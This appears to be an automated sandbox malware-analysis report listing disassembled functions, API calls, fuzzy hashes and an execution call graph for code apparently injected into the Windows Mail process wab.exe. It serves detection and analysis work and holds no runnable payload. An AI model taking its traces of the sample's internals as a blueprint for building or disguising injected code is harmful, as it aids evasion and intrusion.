                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 836851c52b46a5b878917c1b372fe28f0c1e77369b46353ec803cc016625d5cd
                      • Instruction ID: 11957107b8ec56fce1856f1919a6edf75ce7f230e8075cb74f47e548b93e09a2
                      • Opcode Fuzzy Hash: 836851c52b46a5b878917c1b372fe28f0c1e77369b46353ec803cc016625d5cd
                      • Instruction Fuzzy Hash: 7EF0FE70825128DBE7015F3499C14083FB1FBA5660341251AF8D1B7669EFBE89C2EBC4
                      Function 24574BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 24574C1D
                      • _free.LIBCMT ref: 24574CE8
                      • _free.LIBCMT ref: 24574CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Program Files (x86)\windows mail\wab.exe
                      • API String ID: 2506810119-3377118234
                      • Opcode ID: a870ebf0ae0a031daade236eaf2217e335092a1ef3af622af4b125f7e04194bb
                      • Instruction ID: 768f7ce065676b8b35018637bec55048b8a398c32591369ca28baacfd877649f
                      • Opcode Fuzzy Hash: a870ebf0ae0a031daade236eaf2217e335092a1ef3af622af4b125f7e04194bb
                      • Instruction Fuzzy Hash: 04318271E00218EFDB11CF99D980D9EBFFCEB96710F1041B6E984A7211DB758A81EB90
                      Function 245786E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,24576FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 24578731
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 245787BA
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 245787CC
                      • __freea.LIBCMT ref: 245787D5
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 32eccab47b3eeedf46ca03be4923ffbac4b84456d4246ad58a52151b9bb83370
                      • Instruction ID: a2b93adf30dae5c715fc3b130865624d2da703dd2a8def2b1e5fcc440153f46b
                      • Opcode Fuzzy Hash: 32eccab47b3eeedf46ca03be4923ffbac4b84456d4246ad58a52151b9bb83370
                      • Instruction Fuzzy Hash: A031AD32A0021AABDF158F65DC85DBF7BB5EB40310F000178FD45EA190E73AD954EBA0
                      Function 24575CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,24571D66,00000000,00000000,?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue), ref: 24575D13
                      • GetLastError.KERNEL32(?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue,2457E190,FlsSetValue,00000000,00000364,?,24575BC8), ref: 24575D1F
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue,2457E190,FlsSetValue,00000000), ref: 24575D2D
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 2f764f75fccb3e9dcc088d38db8217702b286d3d02a13da626c6732271cda2d6
                      • Instruction ID: 75998b618f13b51d1d32e97f6d34666b07202ec050308e53de33a72c84846bff
                      • Opcode Fuzzy Hash: 2f764f75fccb3e9dcc088d38db8217702b286d3d02a13da626c6732271cda2d6
                      • Instruction Fuzzy Hash: 6B01A73671222ABBC7124A79AC4CF467B68FF456B17104A30FA89E7580E725DA05CAE0
                      Function 245763F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 2457655C
                        • Part of subcall function 245762BC: IsProcessorFeaturePresent.KERNEL32(00000017,245762AB,00000000,?,?,?,?,00000016,?,?,245762B8,00000000,00000000,00000000,00000000,00000000), ref: 245762BE
                        • Part of subcall function 245762BC: GetCurrentProcess.KERNEL32(C0000417), ref: 245762E0
                        • Part of subcall function 245762BC: TerminateProcess.KERNEL32(00000000), ref: 245762E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                      • String ID: *?$.
                      • API String ID: 2667617558-3972193922
                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction ID: 38b57c91c676c8d91c3a8a4f24ade9f4466e3940df275c8c52aea4ebf948424a
                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction Fuzzy Hash: 12519475E00209AFDB05CFA8D880AADBBF5EF98724F144179D594E7305E635DA01EB50
                      Function 245716AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: : $Se.
                      • API String ID: 4218353326-4089948878
                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction ID: e3c5bbc70e7108c6af857050f21690af73bcccc63c46d608222c3af26496ec52
                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction Fuzzy Hash: D4110671D00288AEDB11CFA8D840BDEFBFDEF59204F10406AE585EB252E6709B02D765
                      Function 24571EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 24572903
                        • Part of subcall function 245735D2: RaiseException.KERNEL32(?,?,?,24572925,00000000,00000000,00000000,?,?,?,?,?,24572925,?,245821B8), ref: 24573632
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 24572920
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 3e343a748f437fb1fb0738bcc8750d34bb88e59525106b6cb699474f8df2e326
                      • Instruction ID: c029eb827a8c797f9ade7c3a100cdd08081a8e67ccc6623e1e568d45b0041d85
                      • Opcode Fuzzy Hash: 3e343a748f437fb1fb0738bcc8750d34bb88e59525106b6cb699474f8df2e326
                      • Instruction Fuzzy Hash: 8CF02834A0030C739B00A6A5FC84D9D3BBC9F51650B508570FAD4AE095FF31EA56F5C0
                      Function 245769F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                      • GetOEMCP.KERNEL32(00000000,?,?,24576C7C,?), ref: 24576A1E
                      • GetACP.KERNEL32(00000000,?,?,24576C7C,?), ref: 24576A35
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: |lW$
                      • API String ID: 0-2291785022
                      • Opcode ID: 4213143e3df75704345c192f8d0a85542272502c93eb9d5adef3b2b860ea2e3a
                      • Instruction ID: 239eb2081a0423fbaab8493c3ce97a01e9656becec886604a2d6b3b65a944097
                      • Opcode Fuzzy Hash: 4213143e3df75704345c192f8d0a85542272502c93eb9d5adef3b2b860ea2e3a
                      • Instruction Fuzzy Hash: 64F04930900149CFD700DB68D448B6C7BB0FF40735F1497A8F4B89A1D6EBBA999ADB81

                      Execution Graph

                      Execution Coverage:6.3%
                      Dynamic/Decrypted Code Coverage:9.2%
                      Signature Coverage:2.4%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:62
                      execution_graph 40365 441a73 148 API calls 40696 441819 40699 430737 40696->40699 40698 441825 40700 430756 40699->40700 40710 43076d 40699->40710 40701 430774 40700->40701 40702 43075f 40700->40702 40714 43034a memcpy 40701->40714 40713 4169a7 11 API calls 40702->40713 40705 4307ce 40706 430819 memset 40705->40706 40715 415b2c 11 API calls 40705->40715 40706->40710 40707 43077e 40707->40705 40707->40710 40711 4307fa 40707->40711 40709 4307e9 40709->40706 40709->40710 40710->40698 40716 4169a7 11 API calls 40711->40716 40713->40710 40714->40707 40715->40709 40716->40710 37672 442ec6 19 API calls 37845 4152c6 malloc 37846 4152e2 37845->37846 37847 4152ef 37845->37847 37849 416760 11 API calls 37847->37849 37849->37846 38472 4466f4 38491 446904 38472->38491 38474 446700 GetModuleHandleA 38477 446710 __set_app_type __p__fmode __p__commode 38474->38477 38476 4467a4 38478 4467ac __setusermatherr 38476->38478 38479 4467b8 38476->38479 38477->38476 38478->38479 38492 4468f0 _controlfp 38479->38492 38481 4467bd _initterm __wgetmainargs _initterm 38483 44681e GetStartupInfoW 38481->38483 38484 446810 38481->38484 38485 446866 GetModuleHandleA 38483->38485 38493 41276d 38485->38493 38489 446896 exit 38490 44689d _cexit 38489->38490 38490->38484 38491->38474 38492->38481 38494 41277d 38493->38494 38536 4044a4 LoadLibraryW 38494->38536 38496 412785 38528 412789 38496->38528 38544 414b81 38496->38544 38499 4127c8 38550 412465 memset ??2@YAPAXI 38499->38550 38501 4127ea 38562 40ac21 38501->38562 38506 412813 38580 40dd07 memset 38506->38580 38507 412827 38585 40db69 memset 38507->38585 38510 412822 38606 4125b6 ??3@YAXPAX 38510->38606 38512 40ada2 _wcsicmp 38513 41283d 38512->38513 38513->38510 38516 412863 CoInitialize 38513->38516 38590 41268e 38513->38590 38610 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38516->38610 38520 41296f 38612 40b633 38520->38612 38523 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38527 412957 38523->38527 38533 4128ca 38523->38533 38527->38510 38528->38489 38528->38490 38529 4128d0 TranslateAcceleratorW 38530 412941 GetMessageW 38529->38530 38529->38533 38530->38527 38530->38529 38531 412909 IsDialogMessageW 38531->38530 38531->38533 38532 4128fd IsDialogMessageW 38532->38530 38532->38531 38533->38529 38533->38531 38533->38532 38534 41292b TranslateMessage DispatchMessageW 38533->38534 38535 41291f IsDialogMessageW 38533->38535 38534->38530 38535->38530 38535->38534 38537 4044cf GetProcAddress 38536->38537 38540 4044f7 38536->38540 38538 4044e8 FreeLibrary 38537->38538 38541 4044df 38537->38541 38539 4044f3 38538->38539 38538->38540 38539->38540 38542 404507 MessageBoxW 38540->38542 38543 40451e 38540->38543 38541->38538 38542->38496 38543->38496 38545 414b8a 38544->38545 38546 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38544->38546 38616 40a804 memset 38545->38616 38546->38499 38549 414b9e GetProcAddress 38549->38546 38552 4124e0 38550->38552 38551 412505 ??2@YAPAXI 38553 41251c 38551->38553 38555 412521 38551->38555 38552->38551 38638 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38553->38638 38627 444722 38555->38627 38561 41259b wcscpy 38561->38501 38643 40b1ab ??3@YAXPAX ??3@YAXPAX 38562->38643 38566 40ad4b 38575 40ad76 38566->38575 38656 40a9ce 38566->38656 38567 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38569 40ac5c 38567->38569 38569->38566 38569->38567 38570 40ace7 ??3@YAXPAX 38569->38570 38569->38575 38647 40a8d0 7 API calls 38569->38647 38648 4099f4 38569->38648 38570->38569 38644 40aa04 38575->38644 38576 40ada2 38577 40adc9 38576->38577 38578 40adaa 38576->38578 38577->38506 38577->38507 38578->38577 38579 40adb3 _wcsicmp 38578->38579 38579->38577 38579->38578 38662 40dce0 38580->38662 38582 40dd3a GetModuleHandleW 38667 40dba7 38582->38667 38586 40dce0 3 API calls 38585->38586 38587 40db99 38586->38587 38739 40dae1 38587->38739 38753 402f3a 38590->38753 38592 412766 38592->38510 38592->38516 38593 4126d3 _wcsicmp 38594 4126a8 38593->38594 38594->38592 38594->38593 38596 41270a 38594->38596 38788 4125f8 7 API calls 38594->38788 38596->38592 38756 411ac5 38596->38756 38607 4125da 38606->38607 38608 4125f0 38607->38608 38609 4125e6 DeleteObject 38607->38609 38611 40b1ab ??3@YAXPAX ??3@YAXPAX 38608->38611 38609->38608 38610->38523 38611->38520 38613 40b640 38612->38613 38614 40b639 ??3@YAXPAX 38612->38614 38615 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->38615 38614->38613 38615->38528 38617 40a83b GetSystemDirectoryW 38616->38617 38618 40a84c wcscpy 38616->38618 38617->38618 38623 409719 wcslen 38618->38623 38621 40a881 LoadLibraryW 38622 40a886 38621->38622 38622->38546 38622->38549 38624 409724 38623->38624 38625 409739 wcscat LoadLibraryW 38623->38625 38624->38625 38626 40972c wcscat 38624->38626 38625->38621 38625->38622 38626->38625 38628 444732 38627->38628 38629 444728 DeleteObject 38627->38629 38639 409cc3 38628->38639 38629->38628 38631 412551 38632 4010f9 38631->38632 38633 401130 38632->38633 38634 401134 GetModuleHandleW LoadIconW 38633->38634 38635 401107 wcsncat 38633->38635 38636 40a7be 38634->38636 38635->38633 38637 40a7d2 38636->38637 38637->38561 38637->38637 38638->38555 38642 409bfd memset wcscpy 38639->38642 38641 409cdb CreateFontIndirectW 38641->38631 38642->38641 38643->38569 38645 40aa14 38644->38645 38646 40aa0a ??3@YAXPAX 38644->38646 38645->38576 38646->38645 38647->38569 38649 409a41 38648->38649 38650 4099fb malloc 38648->38650 38649->38569 38652 409a37 38650->38652 38653 409a1c 38650->38653 38652->38569 38654 409a30 ??3@YAXPAX 38653->38654 38655 409a20 memcpy 38653->38655 38654->38652 38655->38654 38657 40a9e7 38656->38657 38658 40a9dc ??3@YAXPAX 38656->38658 38660 4099f4 3 API calls 38657->38660 38659 40a9f2 38658->38659 38661 40a8d0 7 API calls 38659->38661 38660->38659 38661->38575 38686 409bca GetModuleFileNameW 38662->38686 38664 40dce6 wcsrchr 38665 40dcf5 38664->38665 38666 40dcf9 wcscat 38664->38666 38665->38666 38666->38582 38687 44db70 38667->38687 38671 40dbfd 38690 4447d9 38671->38690 38674 40dc34 wcscpy wcscpy 38716 40d6f5 38674->38716 38675 40dc1f wcscpy 38675->38674 38678 40d6f5 3 API calls 38679 40dc73 38678->38679 38680 40d6f5 3 API calls 38679->38680 38681 40dc89 38680->38681 38682 40d6f5 3 API calls 38681->38682 38683 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38682->38683 38722 40da80 38683->38722 38686->38664 38688 40dbb4 memset memset 38687->38688 38689 409bca GetModuleFileNameW 38688->38689 38689->38671 38692 4447f4 38690->38692 38691 40dc1b 38691->38674 38691->38675 38692->38691 38693 444807 ??2@YAPAXI 38692->38693 38694 44481f 38693->38694 38695 444873 _snwprintf 38694->38695 38696 4448ab wcscpy 38694->38696 38729 44474a 8 API calls 38695->38729 38698 4448bb 38696->38698 38730 44474a 8 API calls 38698->38730 38699 4448a7 38699->38696 38699->38698 38701 4448cd 38731 44474a 8 API calls 38701->38731 38703 4448e2 38732 44474a 8 API calls 38703->38732 38705 4448f7 38733 44474a 8 API calls 38705->38733 38707 44490c 38734 44474a 8 API calls 38707->38734 38709 444921 38735 44474a 8 API calls 38709->38735 38711 444936 38736 44474a 8 API calls 38711->38736 38713 44494b 38737 44474a 8 API calls 38713->38737 38715 444960 ??3@YAXPAX 38715->38691 38717 44db70 38716->38717 38718 40d702 memset GetPrivateProfileStringW 38717->38718 38719 40d752 38718->38719 38720 40d75c WritePrivateProfileStringW 38718->38720 38719->38720 38721 40d758 38719->38721 38720->38721 38721->38678 38723 44db70 38722->38723 38724 40da8d memset 38723->38724 38725 40daac LoadStringW 38724->38725 38726 40dac6 38725->38726 38726->38725 38728 40dade 38726->38728 38738 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38726->38738 38728->38510 38729->38699 38730->38701 38731->38703 38732->38705 38733->38707 38734->38709 38735->38711 38736->38713 38737->38715 38738->38726 38749 409b98 GetFileAttributesW 38739->38749 38741 40daea 38742 40db63 38741->38742 38743 40daef wcscpy wcscpy GetPrivateProfileIntW 38741->38743 38742->38512 38750 40d65d GetPrivateProfileStringW 38743->38750 38745 40db3e 38751 40d65d GetPrivateProfileStringW 38745->38751 38747 40db4f 38752 40d65d GetPrivateProfileStringW 38747->38752 38749->38741 38750->38745 38751->38747 38752->38742 38789 40eaff 38753->38789 38757 411ae2 memset 38756->38757 38758 411b8f 38756->38758 38829 409bca GetModuleFileNameW 38757->38829 38770 411a8b 38758->38770 38760 411b0a wcsrchr 38761 411b22 wcscat 38760->38761 38762 411b1f 38760->38762 38830 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38761->38830 38762->38761 38764 411b67 38831 402afb 38764->38831 38768 411b7f 38887 40ea13 SendMessageW memset SendMessageW 38768->38887 38771 402afb 27 API calls 38770->38771 38772 411ac0 38771->38772 38773 4110dc 38772->38773 38774 41113e 38773->38774 38779 4110f0 38773->38779 38912 40969c LoadCursorW SetCursor 38774->38912 38776 411143 38913 444a54 38776->38913 38916 4032b4 38776->38916 38934 40b1ab ??3@YAXPAX ??3@YAXPAX 38776->38934 38777 4110f7 _wcsicmp 38777->38779 38778 411157 38780 40ada2 _wcsicmp 38778->38780 38779->38774 38779->38777 38935 410c46 10 API calls 38779->38935 38783 411167 38780->38783 38781 4111af 38783->38781 38784 4111a6 qsort 38783->38784 38784->38781 38788->38594 38790 40eb10 38789->38790 38802 40e8e0 38790->38802 38793 40eb6c memcpy memcpy 38794 40ebb7 38793->38794 38794->38793 38795 40ebf2 ??2@YAPAXI ??2@YAPAXI 38794->38795 38796 40d134 16 API calls 38794->38796 38797 40ec2e ??2@YAPAXI 38795->38797 38799 40ec65 38795->38799 38796->38794 38797->38799 38799->38799 38812 40ea7f 38799->38812 38801 402f49 38801->38594 38803 40e8f2 38802->38803 38804 40e8eb ??3@YAXPAX 38802->38804 38805 40e900 38803->38805 38806 40e8f9 ??3@YAXPAX 38803->38806 38804->38803 38807 40e911 38805->38807 38808 40e90a ??3@YAXPAX 38805->38808 38806->38805 38809 40e931 ??2@YAPAXI ??2@YAPAXI 38807->38809 38810 40e921 ??3@YAXPAX 38807->38810 38811 40e92a ??3@YAXPAX 38807->38811 38808->38807 38809->38793 38810->38811 38811->38809 38813 40aa04 ??3@YAXPAX 38812->38813 38814 40ea88 38813->38814 38815 40aa04 ??3@YAXPAX 38814->38815 38816 40ea90 38815->38816 38817 40aa04 ??3@YAXPAX 38816->38817 38818 40ea98 38817->38818 38819 40aa04 ??3@YAXPAX 38818->38819 38820 40eaa0 38819->38820 38821 40a9ce 4 API calls 38820->38821 38822 40eab3 38821->38822 38823 40a9ce 4 API calls 38822->38823 38824 40eabd 38823->38824 38825 40a9ce 4 API calls 38824->38825 38826 40eac7 38825->38826 38827 40a9ce 4 API calls 38826->38827 38828 40ead1 38827->38828 38828->38801 38829->38760 38830->38764 38888 40b2cc 38831->38888 38833 402b0a 38834 40b2cc 27 API calls 38833->38834 38835 402b23 38834->38835 38836 40b2cc 27 API calls 38835->38836 38837 402b3a 38836->38837 38838 40b2cc 27 API calls 38837->38838 38839 402b54 38838->38839 38840 40b2cc 27 API calls 38839->38840 38841 402b6b 38840->38841 38842 40b2cc 27 API calls 38841->38842 38843 402b82 38842->38843 38844 40b2cc 27 API calls 38843->38844 38845 402b99 38844->38845 38846 40b2cc 27 API calls 38845->38846 38847 402bb0 38846->38847 38848 40b2cc 27 API calls 38847->38848 38849 402bc7 38848->38849 38850 40b2cc 27 API calls 38849->38850 38851 402bde 38850->38851 38852 40b2cc 27 API calls 38851->38852 38853 402bf5 38852->38853 38854 40b2cc 27 API calls 38853->38854 38855 402c0c 38854->38855 38856 40b2cc 27 API calls 38855->38856 38857 402c23 38856->38857 38858 40b2cc 27 API calls 38857->38858 38859 402c3a 38858->38859 38860 40b2cc 27 API calls 38859->38860 38861 402c51 38860->38861 38862 40b2cc 27 API calls 38861->38862 38863 402c68 38862->38863 38864 40b2cc 27 API calls 38863->38864 38865 402c7f 38864->38865 38866 40b2cc 27 API calls 38865->38866 38867 402c99 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 402cb3 38868->38869 38870 40b2cc 27 API calls 38869->38870 38871 402cd5 38870->38871 38872 40b2cc 27 API calls 38871->38872 38873 402cf0 38872->38873 38874 40b2cc 27 API calls 38873->38874 38875 402d0b 38874->38875 38876 40b2cc 27 API calls 38875->38876 38877 402d26 38876->38877 38878 40b2cc 27 API calls 38877->38878 38879 402d3e 38878->38879 38880 40b2cc 27 API calls 38879->38880 38881 402d59 38880->38881 38882 40b2cc 27 API calls 38881->38882 38883 402d78 38882->38883 38884 40b2cc 27 API calls 38883->38884 38885 402d93 38884->38885 38886 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38885->38886 38886->38768 38887->38758 38891 40b58d 38888->38891 38890 40b2d1 38890->38833 38892 40b5a4 GetModuleHandleW FindResourceW 38891->38892 38893 40b62e 38891->38893 38894 40b5c2 LoadResource 38892->38894 38896 40b5e7 38892->38896 38893->38890 38895 40b5d0 SizeofResource LockResource 38894->38895 38894->38896 38895->38896 38896->38893 38904 40afcf 38896->38904 38898 40b608 memcpy 38907 40b4d3 memcpy 38898->38907 38900 40b61e 38908 40b3c1 18 API calls 38900->38908 38902 40b626 38909 40b04b 38902->38909 38905 40b04b ??3@YAXPAX 38904->38905 38906 40afd7 ??2@YAPAXI 38905->38906 38906->38898 38907->38900 38908->38902 38910 40b051 ??3@YAXPAX 38909->38910 38911 40b05f 38909->38911 38910->38911 38911->38893 38912->38776 38914 444a64 FreeLibrary 38913->38914 38915 444a83 38913->38915 38914->38915 38915->38778 38917 4032c4 38916->38917 38918 40b633 ??3@YAXPAX 38917->38918 38919 403316 38918->38919 38936 44553b 38919->38936 38923 403480 39132 40368c 15 API calls 38923->39132 38925 403489 38926 40b633 ??3@YAXPAX 38925->38926 38927 403495 38926->38927 38927->38778 38928 4033a9 memset memcpy 38929 4033ec wcscmp 38928->38929 38930 40333c 38928->38930 38929->38930 38930->38923 38930->38928 38930->38929 39130 4028e7 11 API calls 38930->39130 39131 40f508 6 API calls 38930->39131 38932 403421 _wcsicmp 38932->38930 38934->38778 38935->38779 38937 445548 38936->38937 38938 445599 38937->38938 39133 40c768 38937->39133 38939 4455a8 memset 38938->38939 38946 4457f2 38938->38946 39216 403988 38939->39216 38949 445854 38946->38949 39318 403e2d memset memset memset memset memset 38946->39318 38947 4458bb memset memset 38953 414c2e 16 API calls 38947->38953 38999 4458aa 38949->38999 39341 403c9c memset memset memset memset memset 38949->39341 38951 44595e memset memset 38959 414c2e 16 API calls 38951->38959 38952 4455e5 38956 445672 38952->38956 38962 44560f 38952->38962 38954 4458f9 38953->38954 38960 40b2cc 27 API calls 38954->38960 39227 403fbe memset memset memset memset memset 38956->39227 38957 445a00 memset memset 39364 414c2e 38957->39364 38958 445b22 38964 445bca 38958->38964 38965 445b38 memset memset memset 38958->38965 38969 44599c 38959->38969 38970 445909 38960->38970 38973 4087b3 338 API calls 38962->38973 38963 445849 39428 40b1ab ??3@YAXPAX ??3@YAXPAX 38963->39428 38971 445c8b memset memset 38964->38971 39038 445cf0 38964->39038 38974 445bd4 38965->38974 38975 445b98 38965->38975 38978 40b2cc 27 API calls 38969->38978 38979 409d1f 6 API calls 38970->38979 38982 414c2e 16 API calls 38971->38982 38972 44589f 39429 40b1ab ??3@YAXPAX ??3@YAXPAX 38972->39429 38980 445621 38973->38980 38988 414c2e 16 API calls 38974->38988 38975->38974 38984 445ba2 38975->38984 38981 4459ac 38978->38981 38992 445919 38979->38992 39414 4454bf 20 API calls 38980->39414 38994 409d1f 6 API calls 38981->38994 38995 445cc9 38982->38995 39501 4099c6 wcslen 38984->39501 38985 4456b2 39416 40b1ab ??3@YAXPAX ??3@YAXPAX 38985->39416 38987 40b2cc 27 API calls 39000 445a4f 38987->39000 39002 445be2 38988->39002 38989 403335 39129 4452e5 45 API calls 38989->39129 38990 445d3d 39022 40b2cc 27 API calls 38990->39022 38991 445d88 memset memset memset 39005 414c2e 16 API calls 38991->39005 39430 409b98 GetFileAttributesW 38992->39430 38993 445823 38993->38963 39004 4087b3 338 API calls 38993->39004 39006 4459bc 38994->39006 39007 409d1f 6 API calls 38995->39007 38997 445879 38997->38972 39018 4087b3 338 API calls 38997->39018 38999->38947 39023 44594a 38999->39023 39379 409d1f wcslen wcslen 39000->39379 39011 40b2cc 27 API calls 39002->39011 39004->38993 39015 445dde 39005->39015 39497 409b98 GetFileAttributesW 39006->39497 39017 445ce1 39007->39017 39008 445bb3 39504 445403 memset 39008->39504 39009 445680 39009->38985 39250 4087b3 memset 39009->39250 39012 445bf3 39011->39012 39021 409d1f 6 API calls 39012->39021 39013 445928 39013->39023 39431 40b6ef 39013->39431 39024 40b2cc 27 API calls 39015->39024 39521 409b98 GetFileAttributesW 39017->39521 39018->38997 39032 445c07 39021->39032 39033 445d54 _wcsicmp 39022->39033 39023->38951 39037 4459ed 39023->39037 39036 445def 39024->39036 39025 4459cb 39025->39037 39046 40b6ef 252 API calls 39025->39046 39029 40b2cc 27 API calls 39030 445a94 39029->39030 39384 40ae18 39030->39384 39031 44566d 39031->38946 39301 413d4c 39031->39301 39042 445389 258 API calls 39032->39042 39043 445d71 39033->39043 39108 445d67 39033->39108 39035 445665 39415 40b1ab ??3@YAXPAX ??3@YAXPAX 39035->39415 39044 409d1f 6 API calls 39036->39044 39037->38957 39037->38958 39038->38989 39038->38990 39038->38991 39039 445389 258 API calls 39039->38964 39048 445c17 39042->39048 39522 445093 23 API calls 39043->39522 39051 445e03 39044->39051 39046->39037 39047 4456d8 39053 40b2cc 27 API calls 39047->39053 39054 40b2cc 27 API calls 39048->39054 39050 44563c 39050->39035 39056 4087b3 338 API calls 39050->39056 39523 409b98 GetFileAttributesW 39051->39523 39052 40b6ef 252 API calls 39052->38989 39058 4456e2 39053->39058 39059 445c23 39054->39059 39055 445d83 39055->38989 39056->39050 39417 413fa6 _wcsicmp _wcsicmp 39058->39417 39063 409d1f 6 API calls 39059->39063 39061 445e12 39068 445e6b 39061->39068 39074 40b2cc 27 API calls 39061->39074 